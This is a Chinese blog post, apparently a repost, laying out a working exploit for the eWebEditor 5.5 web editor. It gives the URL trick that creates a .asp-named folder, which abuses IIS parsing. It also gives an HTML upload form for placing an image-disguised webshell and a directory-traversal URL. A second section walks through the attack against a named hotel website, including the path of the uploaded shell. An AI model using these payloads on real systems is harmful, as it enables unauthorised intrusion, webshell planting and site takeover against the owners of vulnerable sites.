一个改版的EWEB 5.5漏洞
1、先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action=”http://www.91ri.org/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。
2、第2个漏洞就是:可以直接http://www.91ri.org/ewebeditor/admin/upload.asp?id=16& d_viewmode=&dir=..构造跳转目录。可以跳转到网站根目录,如果目录级别高的话,dir=../../这样来跳转
说明:Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp这个地址地址中的Editor每个网站都不同,管理员可能将其重命名,因此,要根据实际情况来修改。如网站http://www.sz-hotel.com的就是myeWebEditor。
——————————————————————————————————————————-
以下是实际利用过程。
1、网站存在注入,用御剑扫描获取ewebeditor路径:http://www.sz-hotel.com/admin/myeWebEditor/
2、根据上面漏洞介绍,访问http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=du.asp 来创建du.asp目录。
3、修改源代码上传,即将上面的漏洞介绍中的地址替换成目标站点的地址即可。
<form action="http://www.sz-hotel.com/admin/myeWebEditor//asp/upload.asp?action=save&type=image&style=popup&cusdir=du.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 style="width:100%"> <input type=submit value="上传了"></input> </form>
http://www.sz-hotel.com/uploadfile/du.asp/201309/20130905172556467.jpg
参考资料:
1、http://www.91ri.org/111.html
2、http://sb.f4ck.org/thread-13525-1-1.html
转载请注明:jinglingshu的博客 » ewebeditor 5.5漏洞利用